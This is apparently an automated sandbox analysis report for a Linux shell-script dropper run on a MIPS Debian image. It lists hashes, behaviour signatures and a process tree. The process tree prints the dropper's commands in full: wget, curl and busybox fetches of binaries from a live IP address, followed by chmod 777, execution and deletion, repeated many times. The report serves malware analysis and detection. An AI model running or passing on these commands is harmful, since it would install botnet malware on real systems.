Analysis
-
max time kernel
121s -
max time network
124s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
01-11-2024 03:04
Static task
static1
Behavioral task
behavioral1
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
-
Size
10KB
-
MD5
e54d8700e6358f16715e8ef228b233b5
-
SHA1
2ca2659f90f6049ca61904ab718ac6977d98c158
-
SHA256
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a
-
SHA512
bba349a7c47bf864182506b7566ffc31187f0172c915e774a999667b78c355711f5ef30944d0f3dd57b98f2c8aa937245bcf994b33703011343d9f85a71dfbb7
-
SSDEEP
192:W8dUisZBCCvOjsl9/7IJxxMCCvOyi/7IJxxUx:W8dJeBCCvOjslJCCvOy7O
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 927 chmod 873 chmod 867 chmod 957 chmod 747 chmod 784 chmod 879 chmod 903 chmod 951 chmod 963 chmod 975 chmod 740 chmod 945 chmod 981 chmod 933 chmod 812 chmod 759 chmod 891 chmod 897 chmod 819 chmod 885 chmod 909 chmod 939 chmod 861 chmod 915 chmod 921 chmod 969 chmod 835 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 741 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs 748 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame 760 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo 785 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l 813 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX 820 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU 836 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb 862 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu 868 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt 874 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu 880 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS 886 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM 892 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u 898 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX 904 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l 910 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt 916 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu 922 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU 928 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb 934 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu 940 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u 946 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS 952 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM 958 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo 964 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 970 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs 976 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame 982 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l curl File opened for modification /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb curl File opened for modification /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame curl File opened for modification /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX curl File opened for modification /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM curl File opened for modification /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu curl File opened for modification /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs curl File opened for modification /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs curl File opened for modification /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo curl File opened for modification /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt curl File opened for modification /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX curl File opened for modification /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS curl File opened for modification /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 curl File opened for modification /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu curl File opened for modification /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS curl File opened for modification /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u curl File opened for modification /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu curl File opened for modification /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU curl File opened for modification /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo curl File opened for modification /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 curl File opened for modification /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt curl File opened for modification /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb curl File opened for modification /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU curl File opened for modification /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu curl File opened for modification /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l curl File opened for modification /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u curl File opened for modification /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM curl File opened for modification /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame curl
Processes
-
/tmp/3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh/tmp/3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:714
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:719
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:727
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:738
-
-
/bin/chmodchmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:746
-
-
/bin/chmodchmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:755
-
-
/bin/chmodchmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:780
-
-
/bin/chmodchmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:788
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:810
-
-
/bin/chmodchmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:818
-
-
/bin/chmodchmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:832
-
-
/bin/chmodchmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:860
-
-
/bin/chmodchmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:866
-
-
/bin/chmodchmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:872
-
-
/bin/chmodchmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:878
-
-
/bin/chmodchmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:884
-
-
/bin/chmodchmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:890
-
-
/bin/chmodchmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:896
-
-
/bin/chmodchmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:902
-
-
/bin/chmodchmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:908
-
-
/bin/chmodchmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:914
-
-
/bin/chmodchmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:920
-
-
/bin/chmodchmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:926
-
-
/bin/chmodchmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:932
-
-
/bin/chmodchmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:938
-
-
/bin/chmodchmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:941
-
